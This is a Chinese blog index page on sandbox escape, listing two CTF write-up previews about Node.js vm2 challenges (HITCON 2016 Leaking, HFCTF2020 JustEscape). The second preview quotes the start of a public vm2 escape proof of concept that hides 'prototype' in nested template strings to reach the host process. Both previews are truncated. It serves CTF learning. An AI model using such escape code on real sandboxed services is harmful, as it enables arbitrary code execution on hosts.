沙箱逃逸
fmyyy1
最废物的web手
展开
-
[HITCON 2016]Leaking
"use strict";var randomstring = require("randomstring");var express = require("express");var { VM} = require("vm2");var fs = require("fs");var app = express();var flag = require("./config.js").flagapp.get("/", function(req, res) { res.he原创 2021-05-25 20:31:26 · 311 阅读 · 1 评论 -
[HFCTF2020]JustEscape
场景最低行提示不是php,测试过后发现是nodejs。是vm2的沙箱逃逸问题。github上有现成的pochttps://github.com/patriksimek/vm2/issues/225"use strict";const {VM} = require('vm2');const untrusted = '(' + function(){ TypeError[`${`${`prototyp`}e`}`].get_process = f=>f.constructor(原创 2021-04-13 14:26:58 · 1087 阅读 · 2 评论